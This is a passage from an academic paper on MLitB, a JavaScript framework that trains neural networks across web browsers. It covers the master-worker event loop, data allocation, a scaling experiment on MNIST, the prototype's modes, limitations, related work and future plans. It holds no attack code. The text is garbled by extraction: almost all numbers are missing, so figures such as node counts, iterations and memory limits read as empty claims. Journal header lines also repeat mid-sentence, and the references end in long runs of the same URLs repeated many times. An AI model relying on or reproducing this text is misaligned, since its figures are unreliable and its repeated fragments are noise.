iteration duration t, where values of t may range from to s, depending on the size of the network and the problem. mlitb is not limited to a map-reduce paradigm and in fact we believe that our framework opens the door to peer-to-peer or gossip algorithms (boyd et al., ). we are currently developing asynchronous algorithms to improve the scalability of mlitb. master event loop the master event loop consists of five steps and is executed by the master server node as long there is at least one slave node connected. each loop includes one map-reduce step, and runs for at least t seconds. the following steps are executed, in order: (a) new data uploading and allocation. (b) new client trainer initialization and data allocation. (c) training workers reduce step. (d) latency monitoring and data allocation adjustment. (e) master broadcasts parameters. (a) new data uploading and allocation when a client boss uploads data, it directly communicates with the data server using xhr. once the data server has uploaded the zip file, it sends the data indices and classification labels to the boss. the boss then registers the indices with the master server. 
each data index is managed: mlitb stores an allocated index (the worker that is allocated the id) and a cached index (the worker that has cached the id). the master ensures that the data allocation is balanced amongst its clients. once a data set is allocated on the master server, the master allocates indices and sends the set of ids to workers. workers can then request data from the boss, who in turn use its data downloader worker to download those worker meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. specific ids from the data server. the data server sends a zipped file to the data downloader, which are then unzipped and processed by the boss (e.g., jpeg decoding for images). the zip file transfers are fast but the decoding can be slow. we therefore allow workers to begin computing before the entire dataset is downloaded and decoded, allowing projects to start training almost immediately while data gets cached in the background. (b) new client trainer initialization and data allocation when a client boss adds a new slave, a request to join the project is sent to the master. if there is unallocated data, a balanced fraction of the data is allocated to the new worker. if there is no unallocated data, a pie-cutter algorithm is used to remove allocated data from other clients and assign it to the new client. this prevents unnecessary data transfers. the new worker is sent a set of data ids it will need to download from the client’s data worker. once the data has been downloaded and put into the new worker’s cache, the master will then add the new worker to the computation performed at each iteration. the master server is immediately informed when a client or one of its workers is removed from the network. because of this, it can manage the newly unallocated data (that were allocated to if a user closes a client tab, the master will know immediately and take action. in the current implementation, if a user closes the master tab, all current connections are lost. the lost client). (c) training workers’ reduce step the reduce step is completely problem specific. in our prototype, workers compute gradients with respect to model parameters over their allocated data vectors, and the reduce step sums over the gradients and updates the model parameters. (d) latency monitoring and data allocation adjustment the interval t represents both the time of computation and the latency between the client and the master node. the synchronization is stochastic and adaptive. at each reduce step, the master node estimates the latency between the client and the master and informs the client worker how long it should run for. a client does not need to have a batch size because it just clocks its own computation and returns results at the end of its scheduled work time. under this setting, it is possible to have mobile devices that compute only a few gradients per second and a powerful desktop machine that performs hundreds or thousands. this simple approach also allows the master to account for unexpected user activity: if the user’s device slows or has increased latency, the master will decrease the load on the device for the next iteration. generally, devices with a cellular network connection communicate with longer delays than hardwired machines. 
in practice, this means the reduction step in the master node receives delayed responses from slave nodes, forcing it to run the reduction function after the slowest slave node (with largest latency) has returned. this is called asynchronous reduction callback delay. (e) master broadcasts parameters an array of model parameters is broadcast to each clients’ boss worker using xhr; when the boss receives new parameters, they are given to each of its workers who then start another computation iteration. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. ml use-case: deep neural networks the current version of the mlitb software is built around a pervasive ml use-case: deep neural networks (dnns). dnns are the current state-of-the-art prediction models for many tasks, including computer vision (krizhevsky, sutskever & hinton, ; lin, chen & yan, ), speech recognition (hinton et al., ), and natural language processing and machine translation (liu et al., ; bahdanau, cho & bengio, ; sutskever, vinyals & le, ). our implementation only required superficial modifications to an existing javascript implementation (karpathy, ) to fit into our network design. scaling behavior of mlitb we performed an experiment to study the scaling behavior of mlitb prototype. using up to -core workstation machines connected on a local area network using a single router, we trained a simple convolutional nn on the mnist dataset for iterations (with seconds per iteration/synchronization event). the number of slave nodes doubled from slave node specifications ( units): intel core i - . ghz (dual-core); gb ram; windows enterprise x ; google chrome . master node specifications ( unit): intel xeon e . ghz (quad-core); gb ram; ubuntu . lts. nodejs version: v . . . the nn has a × input layer connected to convolution filters (with pooling), followed by a fully connected output layer. one experiment to the next (i.e., , , ,..., ). we are interested in the scaling behavior of two performance indicators: ( ) power, measured in data vectors processed per second, and ( ) latency in milliseconds between slaves and master node. of secondary interest is the generalization performance on the mnist test set. as a feasibility study of a distributed ml framework, we are most interested scaling power while minimizing latency effects during training, but we also want to ensure the correctness of the training algorithm. since optimization using compiled js and/or gpus of the ml javascript library possible, but not our focus, we are less concerned with the power performance of a single slave node. results for power and latency are shown in fig. . power increases linearly up to slave nodes, at which point a large increase in latency limits additional power gains for new nodes. this is due to a single server reaching the limit of its capacity to process incoming gradients synchronously. solutions include using multiple server processes, asynchronous updates, and partial gradient communication. test error, as a function of the number of nodes is shown in fig. after iterations ( s) and iterations ( s); i.e., each point represents the same wall-clock computation time. this demonstrates the correctness of mlitb for a given model architecture and learning hyperparameters. due to the data allocation policy that limits the data vector capacity of each node to , vectors, experiments with more nodes process more of the training set during the training procedure. 
for example, using only slave node trains on / of the full training set. with nodes, the network is training on the full dataset. this policy could easily be modified to include data refreshment when running with unallocated data. the primary latency issue is due to all clients simultaneously sending gradients to the server at the end of each iteration. three simple scaling solutions are ( ) increasing the number of master node processes that receive gradients ( ) using asynchronous update rules (each slave computes for a random amount of time, then sends updates), reducing the load of any one master node process, and ( ) partial communication of gradients (decreasing bandwidth). meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure effects of scaling on power and latency. power—measured as the number of data vectors processed per second—scales linearly until nodes, when the increase in latency jumps. the ideal linear scaling is shown in grey. figure effects of scaling on optimization convergence of the nn is measured in terms of test error after and iterations. each point represents approximately the same wall-clock time ( / s for and iterations, respectively). meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure cifar- project loaded in mlitb. walk-through of mlitb prototype we briefly describe how mlitb works from a researcher’s point of view. specification of neural network and training parameters using a minimalist ui (not shown), the researcher can specify their neural network, for example they can add/remove layers of different types, and adjust regularization parameters (l /l /dropout) and learning rates. alternatively, the researcher can load a previously saved neural network in json format (that may or may not have already been trained). once a nn is specified (or loaded), it appears in the display, along with other neural networks also managed by the master node. by selecting a specific neural network, the researcher can then add workers and data (e.g., project cifar in fig. ). specification of training data image classification data is simple to upload using named directory structures for image labels. for example, for cifar all files in the “apple” subdirectory will be given label “ap- ple” once loaded (e.g., the image file /cifar /apple/apple apple s .png). the entire “cifar ” directory can be zipped and uploaded. mlitb processes jpeg and png formats. a test set can be uploaded in tracker mode. training mode in the training mode, a training worker performs as many gradient computations as possible within the iteration duration t (i.e., during the map step of the main event loop). the total gradient and the number of gradients is sent to the master, which then in the reduce step computes a weighted average of gradients from all workers and takes a gradient step using adagrad (duchi, hazan & singer, ). at the end of the main event loop, new neural network weights are sent via web sockets to both trainer workers (for the next meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure tracking model (model execution). the label of a test image is predicted using the latest nn parameters. users can execute a nn prediction using an image stored on their device or using their device’s camera. 
in this example, an image of a horse is correctly predicted with probability . (the class-conditional predictive probability). gradient computations) and to tracker workers (for computing statistics and executing the latest model). tracking mode there are two possible functions in tracking mode: ( ) executing the neural network on test data, and ( ) monitoring classification error on an independent data set. for , users can predict class labels for images taken with a device’s camera or locally stored images. users can also learn a new classification problem on the fly by taking a picture and giving it a new label; this is treated as a new data vector and a new output neuron is added dynamically to the neural network if the label is also new. figure shows a test image being classified by the cifar trained neural network. for , users create a statistics worker and can upload test images and track their error over time; after each complete evaluation of the test images, the latest neural network received from the master is used. fig. shows the error for cifar using a small test set for the first parameter updates. archiving trained neural network model the prototype does not include a research closure specification. however, it does provide easy archiving functionality. at any moment, users can download the entire model speci- fication and current parameter values in json format. users can then share or initialize a new training session with the json object by uploading it during the model specification phase, which represents a high-level of reproducibility. although the json object fully specifies the model, it does not include training or testing code. despite this shortcoming, using a standard protocol is simple way of providing a lightweight archiving system. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure tracking mode (classification error). a test dataset can be loaded and its classification error rate tracked over iterations; here using a nn trained on cifar- . limitations of mlitb prototype in this section we briefly discuss the limitations of the current prototype; later in section ‘opportunities and challenges’ we will discuss the challenges we face in scaling mlitb to a massive level. our scaling experiment demonstrates that the mlitb prototype can accommodate up to clients before latency significantly degrades its performance. latency, however, is primarily affected by the length of an iteration and by size of the neural network. for longer iterations, latency will become a smaller portion of the main event loop. for very large neural networks, latency will increase due to bandwidth pressure. as discussed previously, the main computational efficiency loss is due to the synchro- nization requirement of the master event loop. this requirement causes the master server to be idle while the clients are computing and the clients to wait while the master processes all the gradients. as the size of the full gradients can be large (at least > mb for small neural networks), the network bandwidth is quickly saturated at the end of a computation iteration and during the parameter broadcast. by changing to an asynchronous model, the master can continuously process gradients and the bandwidth can be maximally utilized. by communicating partial gradients, further efficiency can be attained. we leave this for future work. 
there is a theoretical limit of mb data storage per client (the viable memory of a web-browser). in our experience, the practical limit is closer to mb at which point performance is lost due to memory management issues. we found that mb/s bandwidth was achievable on a local network, which meant that it could handle images on mnist and cifar- easily, but would stall for larger images. with respect to deep neural networks, the data processing ability of a single node was limited (especially is one compared meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. to sophisticated gpu enables libraries (bastien et al., )). although we were most interested in the scaling performance, we note that naive convolution implementations significantly slow performance. we found that reasonable sized images, up to × × pixels, can be processed on mobile devices in less than a second without convolutions, but can take several seconds with convolutions, limiting its usefulness. in the future, near native or better implementations will be required for the convolutional layers. related work mlitb has been influenced by a several different technologies and ideas presented by previous authors and from work in different specialization areas. we briefly summarize this related work below. volunteer computing boinc (anderson, ) is an open-source software library used to set up a grid computing network, allowing anyone with a desktop computer connected to the internet to participate in computation; this is called public resource computing. public resource or volunteer computing was popularized by seti@home (anderson et al., ), a research project that analyzes radio signals from space in the search of signs of extraterrestrial intelligence. more recently, protein folding has emerged as significant success story (lane et al., ). hadoop (shvachko et al., ) is an open-source software system for storing very large datasets and executing user application tasks on large networks of computers. mapreduce (dean & ghemawat, ) is a general solution for performing computation on large datasets using computer clusters. javascript applications in (cushing et al., ) a network of distributed web-browsers called weevilscout is used for complex computation (regular expression matching and binary tree modifications) using a javascript engine. it uses similar technology (web workers and web sockets) as mlitb. convnetjs (karpathy, ) is a javascript implementation of a convolutional neural-network, developed primarily for educational purposes, which is capable of building diverse neural networks to run in a single web browser and trained using stochastic gradient descent; it can be seen as the non-distributed predecessor of mlitb. distributed machine learning the most performant deep neural network models are trained with sophisticated scientific libraries written for gpus (bergstra et al., ; jia et al., ; collobert, kavukcuoglu & farabet, ) that provide orders of magnitude computational speed-ups compared to cpus. each implements some form of stochastic gradient descent (sgd) (bottou, ) as the training algorithm. most implementations are limited to running on the cores of a single machine and by extension the memory limitations of the gpu. exceptionally, there are distributed deep learning algorithms that use a farm of gpus (e.g., downpour sgd (dean et al., )) and farms of commodity servers (e.g., cots-hps (coates et al., )). 
other distributed ml algorithm research includes the parameter server model (li et al., ), parallelized sgd (zinkevich et al., ), and distributed sgd (ahn, shahbaba & welling, ). mlitb could potentially push commodity computing to the extreme using pre-existing devices, some of which may be gpu capable, with and without an organization's existing computing infrastructure. as we discuss below, there are still many open research questions and opportunities for distributed ml algorithm research.

opportunities and challenges
in tandem with our vision, there are several directions the next version of mlitb can take, both in terms of the library itself and the potential kinds of applications a ubiquitous ml framework like mlitb can offer. we first focus on the engineering and research challenges we have discovered during the development of our prototype, along with some we expect as the project grows. second, we look at the opportunities mlitb provides, based not only on the research directions the challenges uncovered, but also on novel application areas that are perfect fits for mlitb. in section 'future mlitb development' we preview the next concrete steps in mlitb development.

challenges
we have identified three key engineering and research challenges that must be overcome for mlitb to achieve its vision of learning models at a global scale.

memory limitations
state-of-the-art neural network models have huge numbers of parameters, which prevents them from fitting onto mobile devices. there are two possible solutions to this problem. the first is to learn or use smaller neural networks. smaller nn models have shown promise on image classification performance; in particular, the network in network (lin, chen & yan, ) model from the caffe model zoo is mb and outperforms alexnet, which is mb (jia et al., ). it is also possible to first train a deep neural network and then use it to train a much smaller, shallow neural network (ba & caruana, ). another solution is to distribute the nn (during training and prediction) across clients; an example of this approach is downpour sgd (dean et al., ).

communication overhead
with large models, large numbers of parameters are communicated regularly. this is a similar issue to the memory limitation and could benefit from the same solutions. however, given a fixed bandwidth and asynchronous parameter updates, we can ask which parameter updates (from master to client) and which gradients (from client to master) should be communicated. an algorithm could transmit a random subset of the weight gradients, or send the most informative ones. in other words, given a fixed bandwidth budget, we want to maximize the information transferred per iteration; a minimal sketch of one such selection rule is given at the end of this section.

performance efficiency
perhaps the biggest argument against scientific computing with javascript is its computational performance. we disagree that this should prevent the widespread adoption of browser-based scientific computing: several groups aim to achieve native performance in javascript (chrome v , ; asm.js, ), and gpu kernels are becoming part of existing web engines (e.g., webcl by khronos: www.khronos.org/webcl) and can be seamlessly incorporated into existing javascript libraries, though they have yet to be written for ml.
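returning to the communication-overhead challenge above, the hedged sketch below (an illustration, not the mlitb scheme) picks the k largest-magnitude gradient entries under a fixed per-message budget and sends them as sparse (index, value) pairs; a real scheme would also need to handle the dropped entries, e.g., by accumulating them locally for a later iteration. the function name and budget are assumptions made for illustration.

    // illustrative sketch only: given a budget of k entries per message, select
    // the k largest-magnitude gradient components and send them as sparse
    // (index, value) pairs. this is one simple notion of "most informative";
    // it is not the scheme used by mlitb.
    function selectTopKGradients(gradient, k) {
      const indexed = Array.from(gradient, (value, index) => ({ index, value }));
      indexed.sort((a, b) => Math.abs(b.value) - Math.abs(a.value));
      return indexed.slice(0, k); // sparse message: k (index, value) pairs
    }

    // toy example: a six-dimensional gradient and a budget of three entries
    const gradient = [0.01, -0.9, 0.05, 0.4, -0.002, 0.3];
    console.log(selectTopKGradients(gradient, 3));
    // -> [ { index: 1, value: -0.9 }, { index: 3, value: 0.4 }, { index: 5, value: 0.3 } ]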
opportunities

massively distributed learning algorithms
the challenges just presented are obvious areas of future distributed machine learning research (and are currently being developed for the next version of mlitb). perhaps more interesting, at a higher level, is that the mlitb vision raises novel questions about what it means to train models on a global scale. for instance, what does it mean for a model to be trained across a global internet of heterogeneous and unreliable devices? is there a single model, or a continuum of models that are consistent locally but differ from one region to another? how should a model adapt over long periods of time? these are largely untapped research areas for ml.

field research
moving data collection and predictive models onto mobile devices makes it easy to bring models into the field. connecting users with mobile devices to powerful nn models can aid field research, e.g., for fast labeling and data gathering. for example, a pilot program of crop surveillance in uganda currently uses bespoke computer vision models for detecting pestilence (insect eggs, leaf diseases, etc.) (quinn, leyton-brown & mwebaze, ). projects like these could leverage publicly available, state-of-the-art computer vision models to bootstrap their field research.

privacy preserving computing and mobile health
our mlitb framework provides a natural platform for the development of real privacy-preserving applications (dwork, ) by naturally protecting user information contained on mobile devices, while still allowing the data to be used for valuable model development. the current version of mlitb does not provide privacy-preserving algorithms such as those of han et al. ( ), but these could be easily incorporated into mlitb. it would therefore be possible for a collection of personal devices to collaboratively train machine learning models using sensitive data stored locally, with modified training algorithms that guarantee privacy. one could imagine, for example, using privately stored images of a skin disease to build a classifier based on a large collection of disease exemplars, with the data always kept on each patient's mobile device, thus never shared, and trained using privacy-preserving algorithms.

green computing
one of our main objectives was to provide simple, cheap, distributed computing capability with mlitb. because mlitb runs with minimal software installation (in most cases requiring none), it is possible to use this framework for low-power-consumption distributed computing. by using existing organizational resources running in low-energy states (dormant or near dormant), mlitb can wake the machines, perform some
computing cycles, and return them to their low-energy states. this is in stark contrast to a data center approach, which has near-constant, heavy energy usage (natural resources defense council, ).

future mlitb development
the next phases of development will focus on the following directions: a visual programming user interface for model configuration, development of a library of ml models and algorithms, development of performant scientific libraries in javascript with and without gpus, and model archiving with the development of a research closure specification.

visual programming
many ml models are constructed as chains of processing modules. this lends itself to a visual programming paradigm, where the chains can be constructed by dragging and dropping modules together. this way models can be visualized, compared, dissected, etc. algorithms are tightly coupled to the model, and a visual representation of the model can allow interaction with the algorithm as it proceeds. for example, learning rates for each layer of a neural network can be adjusted while monitoring error rates (or even turned off for certain layers), or training modules can be added to improve learning of hidden layers for very deep neural networks, as done in szegedy et al. ( ). with a visual ui it would be easy to pull in other existing, pre-trained models, remove parts, and train on new data. for example, a researcher could start with a pre-trained image classifier, remove the last layer, and easily train a new image classifier, taking advantage of an existing, generalized image representation model.

machine learning library
we have currently built a prototype around an existing javascript implementation of dnns (karpathy, ). in the near future we plan on implementing other models (e.g., latent dirichlet allocation) and algorithms (e.g., distributed mcmc (ahn, shahbaba & welling, )). mlitb is agnostic to learning algorithms and is therefore a great platform for researching novel distributed learning algorithms. to do this, however, mlitb will need to completely separate the machine learning model components from the mlitb network. at the moment, the prototype is closely tied to its neural network use-case. once separated, it will be possible for external modules to be added by the open-source community.

gpu implementations
implementations of gpu kernels can bring mlitb performance up to the level of current state-of-the-art scientific libraries such as theano (bergstra et al., ; bastien et al., ) and caffe (jia et al., ), while retaining the advantages of using heterogeneous devices. for example, balancing computational loads during training is very simple in mlitb, and any learning algorithm can be shared by gpu-powered desktops and mobile devices. smartphones could be part of the distributed computing process by permitting the training algorithms to use short bursts of gpu power for their calculations, thereby limiting battery drain and user disruption.

design of research closures
mlitb can save and load json model configurations and parameters, allowing researchers to share and build upon other researchers' work. however, it does not quite achieve our goal of a research closure, where all aspects (code, configuration, parameters, etc.) are saved into a single object. in addition to research closures, we hope to develop a model zoo, akin to caffe's, for posting and sharing research.
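to make the notion of a research closure concrete, the object below is a purely hypothetical sketch of what such a single shareable object could contain; the current prototype archives only the model specification and parameter values, and every field name here is an assumption made for illustration (the data reference is a placeholder url).

    // purely hypothetical sketch of a "research closure": everything needed to
    // reproduce a result, bundled into one shareable json object. field names
    // are illustrative; the prototype currently saves only the model
    // specification and parameter values.
    const researchClosure = {
      model: {
        specification: { layers: [] },        // network architecture, as archived today
        parameters: '<serialized weights>'    // current parameter values, as archived today
      },
      training: {                             // additionally needed for a true closure
        algorithm: 'sgd',
        hyperparameters: { learningRate: 0.01, batchSize: 16 },
        dataReference: 'https://example.org/dataset-manifest.json' // placeholder url
      },
      code: {                                 // training/testing code, referenced or inlined
        repository: 'https://github.com/software-engineering-amsterdam/mlitb',
        commit: '<commit hash>'
      }
    };
    console.log(JSON.stringify(researchClosure, null, 2));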
finally, some kind of system for verifying models, like recomputation.org, would further strengthen the case for mlitb being truly reproducible (and provide backwards compatibility).

conclusion
in this paper we have introduced mlitb: machine learning in the browser, an alternative framework for ml research based entirely on using the browser as the computational engine. the mlitb vision is based upon the overarching objectives of providing ubiquitous ml capability to every computing device, cheap distributed computing, and reproducible research. the mlitb prototype is written entirely in javascript and makes extensive use of existing javascript libraries, including node.js for servers, web workers for non-blocking computation, and web sockets for communication between clients and servers. we demonstrated the potential of mlitb on an ml use-case: deep neural networks trained with distributed stochastic gradient descent using heterogeneous devices, including dedicated grid-computing resources and mobile devices, using the same interface and with no client-side software installation. clients simply connect to the server and computing begins. this use-case has provided valuable information for future versions of mlitb, exposing both existing challenges and interesting research and application opportunities. we have also advocated for a framework which supports reproducible research; mlitb naturally provides this by allowing models and parameters to be saved to a single object which can be reloaded and used by other researchers immediately.

additional information and declarations

funding
the authors acknowledge funding support from amsterdam data science and computing resources from surfsara. m welling acknowledges support from facebook, google, and yahoo. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: surfsara. facebook. google. yahoo.

competing interests
the authors declare there are no competing interests.

author contributions
• edward meeds conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper.
• remco hendriks conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper.
• said al faraby conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work.
• magiel bruntink and max welling wrote the paper, reviewed drafts of the paper.

data availability
the following information was supplied regarding the deposition of related data:
github: github.com/software-engineering-amsterdam/mlitb.

references
ahn s, shahbaba b, welling m. . distributed stochastic gradient mcmc. in: proceedings of the st international conference on machine learning (icml- ), – . available at http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf.
anderson dp. . boinc: a system for public-resource computing and storage. in: proceedings of the workshop on grid computing. piscataway: ieee, – .
anderson dp, cobb j, korpela e, lebofsky m, werthimer d. . seti@home: an experiment in public-resource computing. communications of the acm ( ): – doi . / . .
asm.js. . asm.js: an extraordinarily optimizable, low-level subset of javascript. available at http://asmjs.org (accessed november ).
ba j, caruana r. . do deep nets really need to be deep? in: advances in neural information processing systems, – . available at http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep.
bahdanau d, cho k, bengio y. . neural machine translation by jointly learning to align and translate. arxiv preprint. arxiv: . .
bastien f, lamblin p, pascanu r, bergstra j, goodfellow i, bergeron a, bouchard n, warde-farley d, bengio y. . theano: new features and speed improvements. arxiv preprint. arxiv: . .
begoli e, horey j. . design principles for effective knowledge discovery from big data. in: software architecture (wicsa) and european conference on software architecture (ecsa), joint working ieee/ifip conference on. piscataway: ieee, – .
bergstra j, breuleux o, bastien f, lamblin p, pascanu r, desjardins g, turian j, warde-farley d, bengio y. . theano: a cpu and gpu math expression compiler. in: proceedings of the python for scientific computing conference (scipy). oral presentation. available at http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf.
bottou l. . large-scale machine learning with stochastic gradient descent. in: proceedings of compstat' . new york: springer, – .
boyd s, ghosh a, prabhakar b, shah d. . randomized gossip algorithms. ieee transactions on information theory ( ): – doi . /tit. . .
can i use. . javascript api support comparison. available at http://caniuse.com/#cats=js_api (accessed november ).
casadevall a, fang fc. . reproducible science. infection and immunity ( ): – doi . /iai. - .
chrome v . . chrome v : google's high performance, open source, javascript engine. available at https://developers.google.com/v (accessed november ).
coates a, huval b, wang t, wu d, catanzaro b, andrew n. . deep learning with cots hpc systems. in: proceedings of the th international conference on machine learning, – .
collobert r, kavukcuoglu k, farabet c. . torch : a matlab-like environment for machine learning. in: biglearn, nips workshop. number epfl-conf- . available at http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf.
cushing r, putra ghh, koulouzis s, belloum a, bubak m, de laat c. . distributed computing on an ensemble of browsers. ieee internet computing ( ): – doi . /mic. . .
dean j, corrado g, monga r, chen k, devin m, mao m, ranzato m, senior a, tucker p, yang k, le qv, ng ay. . large scale distributed deep networks. in: pereira f, burges cjc, bottou l, weinberger kq, eds. advances in neural information processing systems. red hook: curran associates, – .
dean j, ghemawat s. . mapreduce: simplified data processing on large clusters. communications of the acm ( ): – doi . / . .
duchi j, hazan e, singer y. . adaptive subgradient methods for online learning and stochastic optimization. the journal of machine learning research : – .
dwork c. . differential privacy: a survey of results. in: theory and applications of models of computation. new york: springer, – .
han s, ng wk, wan l, lee v. . privacy-preserving gradient-descent methods. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . .
hinton g, deng l, yu d, dahl ge, mohamed a, jaitly n, senior a, vanhoucke v, nguyen p, sainath tn, kingsbury b. . deep neural networks for acoustic modeling in speech recognition: the shared views of four research groups. ieee signal processing magazine ( ): – doi . /msp. . .
ietf. . the websocket protocol. available at http://tools.ietf.org/html/rfc (accessed december ).
jia y, shelhamer e, donahue j, karayev s, long j, girshick r, guadarrama s, darrell t. . caffe: convolutional architecture for fast feature embedding. arxiv preprint. arxiv: . .
karpathy a. . convnetjs deep learning in the browser. available at http://www.convnetjs.com (accessed july ).
khan f, foley-bourgon v, kathrotia s, lavoie e, hendren l. . using javascript and webcl for numerical computations: a comparative study of native and web technologies. in: proceedings of the th acm symposium on dynamic languages. new york: acm, – .
krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep convolutional neural networks.
in: advances in neural information processing systems. available at http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks.
lane tj, shukla d, beauchamp ka, pande vs. . to milliseconds and beyond: challenges in the simulation of protein folding. current opinion in structural biology ( ): – doi . /j.sbi. . . .
li m, andersen dg, park jw, smola aj, ahmed a, josifovski v, long j, shekita ej, su b-y. . scaling distributed machine learning with the parameter server. in: the th usenix symposium on operating systems design and implementation, – . available at https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu.
lin m, chen q, yan s. . network in network. arxiv preprint. arxiv: . .
liu s, yang n, li m, zhou m. . a recursive recurrent neural network for statistical machine translation. in: proceedings of acl, – .
mcnutt m. . reproducibility. science ( ): doi . /science. .
natural resources defense council. . data center efficiency assessment. issue paper ip: - -a, august . available at http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf.
quinn ja, leyton-brown k, mwebaze e. . modeling and monitoring crop disease in developing countries. in: proceedings of the twenty-fifth aaai conference on artificial intelligence, aaai , san francisco, california, usa, august – , . palo alto: aaai. available at https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / .
ray b, posnett d, filkov v, devanbu p. . a large scale study of programming languages and code quality in github. in: proceedings of the nd acm sigsoft international symposium on foundations of software engineering, fse . new york: acm, – .
shvachko k, kuang h, radia s, chansler r. . the hadoop distributed file system. in: mass storage systems and technologies (msst), ieee th symposium on. piscataway: ieee, – .
stodden v, borwein j, bailey dh. . "setting the default to reproducible" in computational science research. research ( ): – .
stodden v, guo p, ma z. . toward reproducible computational research: an empirical analysis of data and code policy adoption by journals. plos one ( ):e doi . /journal.pone. .
sutskever i, vinyals o, le qv. . sequence to sequence learning with neural networks. arxiv preprint. arxiv: . .
szegedy c, liu w, jia y, sermanet p, reed s, anguelov d, erhan d, vanhoucke v, rabinovich a. . going deeper with convolutions. arxiv preprint. arxiv: . v .
tilkov s, vinoski s. . node.js: using javascript to build high-performance network programs. ieee internet computing ( ): – doi . /mic. . .
w c. . web workers, editor's draft may . available at http://dev.w .org/html /workers (accessed december ).
w techs. . usage of javascript for websites. available at http://w techs.com/technologies/details/cp-javascript/all/all (accessed june ).
zinkevich m, weimer m, li l, smola aj. . parallelized stochastic gradient descent. in: advances in neural information processing systems, – . available at http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf.
/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu http://arxiv.org/abs/ . http://dx.doi.org/ . /science. 
http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf 